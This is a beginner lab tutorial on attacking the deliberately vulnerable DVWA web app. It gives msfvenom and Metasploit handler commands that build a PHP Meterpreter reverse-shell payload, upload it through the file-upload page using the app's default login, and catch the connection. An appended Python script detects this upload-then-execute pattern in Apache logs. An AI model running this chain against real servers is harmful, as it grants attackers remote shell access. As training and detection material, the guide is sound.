Web Server Penetration Testing with DVWA and Metasploit (Beginner Guide)

Open your Kali Linux terminal and type:

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw

This generates the raw PHP code for the payload.

Now copy the generated code into a text file and save it on your desktop with a .php extension.

Now open the DVWA web app on your server and log in with the following credentials:

Username: admin

Password: password

Now scroll to the File Upload section in the left pane and upload the PHP file created above.

When the upload finishes, DVWA shows the path of the uploaded file.

Now open your uploaded file in the browser.

Now we need to set up a listener in Metasploit to handle the reverse connection sent by the victim when the payload executes successfully.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost

set lport 4444


Now you can access the victim’s server
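The sequence above (a POST to the upload form, then a request for a .php file inside the upload directory) leaves a recognisable trail in the web server's access log. The following detection script is an added example, not part of the original guide; the Apache combined log format, the /upload/ form path, the /uploads/ directory and the sample log lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Assumptions (not from the guide): Apache "combined" log format, an upload
# form at /upload/ and an upload directory at /uploads/. Adjust to your app.
UPLOAD_FORM = "/upload/"
UPLOAD_DIR = "/uploads/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "POST /upload/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2024:10:01:30 +0000] "GET /uploads/report.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:02:00 +0000] "POST /upload/ HTTP/1.1" 200 498 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:02:05 +0000] "GET /uploads/cat.png HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:11:30:00 +0000] "GET /uploads/old.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

def find_upload_then_execute(log_text, window=timedelta(minutes=10)):
    """Return (ip, path, time) for script requests in the upload directory
    that succeed within `window` after the same client POSTed to the form."""
    last_post = {}   # client ip -> time of most recent upload POST
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if m["method"] == "POST" and path.startswith(UPLOAD_FORM):
            last_post[m["ip"]] = ts
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            posted = last_post.get(m["ip"])
            if m["status"].startswith("2") and posted and ts - posted <= window:
                alerts.append((m["ip"], path, ts.isoformat()))
    return alerts

if __name__ == "__main__":
    for alert in find_upload_then_execute(SAMPLE_LOG):
        print("ALERT upload-then-execute:", *alert)
```

A successful response for a script file served from an upload directory is worth alerting on even without the preceding POST; the time window only raises confidence that the same client planted the file.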


